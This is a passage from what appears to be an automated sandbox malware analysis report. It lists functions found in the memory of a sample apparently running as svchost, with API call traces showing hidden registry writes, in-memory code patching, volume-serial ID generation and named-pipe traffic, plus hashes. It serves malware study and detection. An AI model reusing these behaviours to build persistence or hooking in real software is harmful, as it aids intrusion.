                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02BC4762
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4043890984-3673152959
                                                                                                                                                                                                                • Opcode ID: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                                • Instruction ID: 65aba80652946656d5089a921dc38f20a7ee95edbd385ce473e2f8a34ea12d45
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB311C32D00259ABDB32CB648C18FDB7BB8EF86744F1542E9EE5497100D7709B49CBA0
                                                                                                                                                                                                                Function 02BCA7B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysynchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02BCA7CB
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02BCA818
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02BCA847
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000), ref: 02BCA84E
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02BCA862
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 02BCA879
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCA881
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 842647815-465009422
                                                                                                                                                                                                                • Opcode ID: cd9f730931c5bed5b03d914691b88a2513a072b96d8a627bc33a5547000e557e
                                                                                                                                                                                                                • Instruction ID: e0a356b061ffd25b7a78c10dc231e58ebd6dd4ad5791d4e29f18d3d818da636e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd9f730931c5bed5b03d914691b88a2513a072b96d8a627bc33a5547000e557e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1216B75A40705EFD764CF19C988E2AB7B5FF48700F108958EA4A9B790C730F951CBA0
                                                                                                                                                                                                                Function 02BCA140 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCA147
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BCA159
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02BCA33F,?,02BCA33F), ref: 02BCA173
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(02BCA33F,9e938cfca,00000000,00000004,00000004,00000004,02BCA33F), ref: 02BCA190
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BCA19A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BCA1A4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                • String ID: 9e938cfca$software\microsoft
                                                                                                                                                                                                                • API String ID: 287100044-3363573929
                                                                                                                                                                                                                • Opcode ID: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                                • Instruction ID: e8ae4ab36f47a3ee8a0ea2401fe34e19b0b3e41f8a59cc8cc13faddb8886655b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF03C75A81218FBE720ABA09D49F9E7B78AB04741F904544FB02A7280D6716A108BE4
                                                                                                                                                                                                                Function 02BD5A50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD5B86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                                • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$617D73CA$9E938C60a
                                                                                                                                                                                                                • API String ID: 2823094833-2422844119
                                                                                                                                                                                                                • Opcode ID: 3e75261fae8a6938fa13fb433bc8da5d410697c29a3edd0af14d887439efb91e
                                                                                                                                                                                                                • Instruction ID: cb958ff692104d6db27df13fdbc8258174bfdb83d2c0d626fe95de9914bee7b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e75261fae8a6938fa13fb433bc8da5d410697c29a3edd0af14d887439efb91e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8412D71A002199BD724CF688DC4BEEF7EAEF94300F9541E1D649AB181E7B16B49C750
                                                                                                                                                                                                                Function 02BC5AF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC5B18
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(02BC6C37,9e938b89a,00000000,?,00000000,?), ref: 02BC5B5A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BC6C37), ref: 02BC5B64
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(-80000001), ref: 02BC5B2A
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(02BC5B76,9e938d6ea,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegQueryValueExA.KERNEL32(?,9e938d6ea,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9E938430a$9e938b89a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-3787693855
                                                                                                                                                                                                                • Opcode ID: fd8f9bbf0617196c5251f5a3f23260377783634c189c869dffc6e3627c999fc0
                                                                                                                                                                                                                • Instruction ID: a62715dba59afcd3f8e8fea421f693567b980b65ed039a08091328cd8cbc8039
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd8f9bbf0617196c5251f5a3f23260377783634c189c869dffc6e3627c999fc0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F0112B5E90209ABDB20DFF4CC45BEEBBB8EB04744F504698F615E7280E774A5148B94
                                                                                                                                                                                                                Function 02BCA540 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA5A0
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA67A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA686
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA697
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA69E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2609073853-0
                                                                                                                                                                                                                • Opcode ID: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                                • Instruction ID: 1d9525954b464bd3715ad2aa41e407b1b0aa722e1044ac8a64d1080cfb320eb2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29412C72A0061AABCB10AE788CC4FBE7B6AEF80354F54467CE65597385DB35E901C7A0
                                                                                                                                                                                                                Function 02BD8FF0 Relevance: 10.6, APIs: 7, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02BD94A4,00000000,00140B17), ref: 02BD9005
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD900C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD901F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,02BD94A0,?,02BD94A4,00000000,00140B17), ref: 02BD90CE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90D1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90DD
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90E0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 219023833-0
                                                                                                                                                                                                                • Opcode ID: 3f4a04a757d2eee8b3826eafebb9a8c9439b8630387e2557e421b6470a2f9e25
                                                                                                                                                                                                                • Instruction ID: a770b4934166d9393e8e14f96e64c1db0b9c2d20240669e9d8d3d11c7de23ac7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f4a04a757d2eee8b3826eafebb9a8c9439b8630387e2557e421b6470a2f9e25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56219FB1A017009FC721AF75D884ADBBFE9EF49754B40885DE69E8B200D774A405CFA2
                                                                                                                                                                                                                Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                Function 02BB78E0 Relevance: 10.6, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75572F00,02BC3D3F), ref: 02BB791C
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02BB7923
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7933
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75572F00,02BC3D3F), ref: 02BB7955
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB7958
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7965
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB7968
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$AllocateValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3862602232-0
                                                                                                                                                                                                                • Opcode ID: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                                • Instruction ID: 023e1a8f1ddeec67437704c4c3ab3070623ee9a422b2ba651f2a4461b04d62a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F411A372A01214BBD731AAA59C44FABB66CEFC8B55F510154BA44E7280DFB0D90087E0
                                                                                                                                                                                                                Function 02BB38A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02BB3B25,?), ref: 02BB38C0
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(00000000,9e938dd0a,00000000,00000004,?,00000004,?,?,02BB3B25,?), ref: 02BB38DC
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38EA
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                • String ID: 9e938dd0a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2510291871-1418632313
                                                                                                                                                                                                                • Opcode ID: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                                • Instruction ID: 72f9eb0a350d877dc83aa5de527ef66f268be27ba4172f40b2360f624016b842
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F036B5B40304FBEB20CAA1CD4AFAA777CEF04744F504494FB01D7140D7B1AA109795
                                                                                                                                                                                                                Function 02BD9680 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD96E6
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BD96ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BD96FA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BD9701
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD9710
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BD9713
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BD9720
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BD9723
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: 7f55d36ed05eafd1dbe4d4d6453e2716345344de9a9cb730a58166b852bb70c2
                                                                                                                                                                                                                • Instruction ID: 46a71b57f341be64db6ccb3e1155b4f3001a07df70fdade598de3d147e83aca6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f55d36ed05eafd1dbe4d4d6453e2716345344de9a9cb730a58166b852bb70c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A31C475A00704ABDB20DF79D848BDBBBB8FF84314F048999ED59AB241E730D951CBA0
                                                                                                                                                                                                                Function 02BD9880 Relevance: 10.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                                • Instruction ID: 3597fc924cee0faf7a5fc5a14788891d31f161c4a9f7e79458bc170d146ce235
